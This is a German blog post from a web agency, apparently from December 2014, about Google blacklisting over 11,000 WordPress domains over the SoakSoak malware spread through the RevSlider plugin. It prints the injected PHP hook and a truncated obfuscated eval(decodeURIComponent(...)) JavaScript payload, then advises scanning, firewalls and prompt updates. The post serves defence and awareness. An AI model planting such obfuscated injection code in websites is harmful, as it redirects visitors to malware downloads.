Google sperrt wegen Malware-Kampagne mehr als 11.000 Domains

Veröffentlicht am 19 Dez 2014 von B. Eck

Google sperrt wegen einer Malware-Kampagne 11.000 Domains mit WordPress-Webseiten. Die Websites wurden auf die Blacklist gesetzt. Mehr als 100.000 Webseiten von der Malware SoakSoak.ru könnten betroffen sein.

Einfallstor für die Malware ist ein WordPress-Plugin mit dem Namen RevSlider. Die Schwachstelle  dieses Plugin RevSlider verändert die Datei wp-includes/template-loader.php in der WordPress-Installation. Mit Hilfe dieser Schwachstelle wird ein JavaScript-Code aktiviert. Die Besucher einer infizierten Webseite werden auf eine andere Seite weitergeleitet, wo eine Malware als Download bereitsteht.

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Dies bewirkt, dass die wp-includes / js / swfobject.js,  auf jeder Seite, die Sie auf der Website, die hier die Malware enthält geladen werden:

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Das Pikante an der Sache ist folgendes:

Das Plugin RevSlider ist bereits in vielen WordPress-Themes enthalten, ohne dass es den Nutzern bewusst ist. Daher ist jedem WordPress-Nutzer zu empfehlen, seine Seite zu überprüfen. Möglich ist das mit Werkzeugen wie dem SiteCheck Scanner. Mit diesem Scanner kann einfach und kostenlos jede Websites schnell auf Mailware überprüft werden. Es gibt auch einen Thread zu diesem Thema: WordPress Support-Thread .

Sicherheit kann da wirklich eine Website Firewall schaffen. Das Plugin WordPress Firewall 2. kann vor Malware-Angriffen schützen und hat noch weitere Futures in Punkt Sicherheit.

Diese Malware-Angriffe zeigt mal wieder,  dass es unglaublich wichtig ist, die installierte Software immer auf dem aktuellen Stand zu halten und wichtige Updates einzuspielen. Nur mit aktualisierte vollständiger Software kann man vor Sicherheitsrisiken geschützt werden. Dabei ist es wichtig die Software mit allen installierten Plugins bei relevanten Updates immer zeitnah zu aktualisieren.

 

Schlagwörter: , ,

Cookie Consent mit Real Cookie Banner
Webseitec © 2024 Alle Rechte vorbehalten
Webdesign Werbeagentur aus Göcklingen bei Landau in der Pfalz. Ihr Internetdienstleister für Landau, Bad Bergzabern, Kandel, Herxheim, Neustadt / Weinstraße, Annweiler, Hauenstein, Dahn und weitere Städte und Gemeinden in Region Pfalz und Rhein-Neckar-Kreis.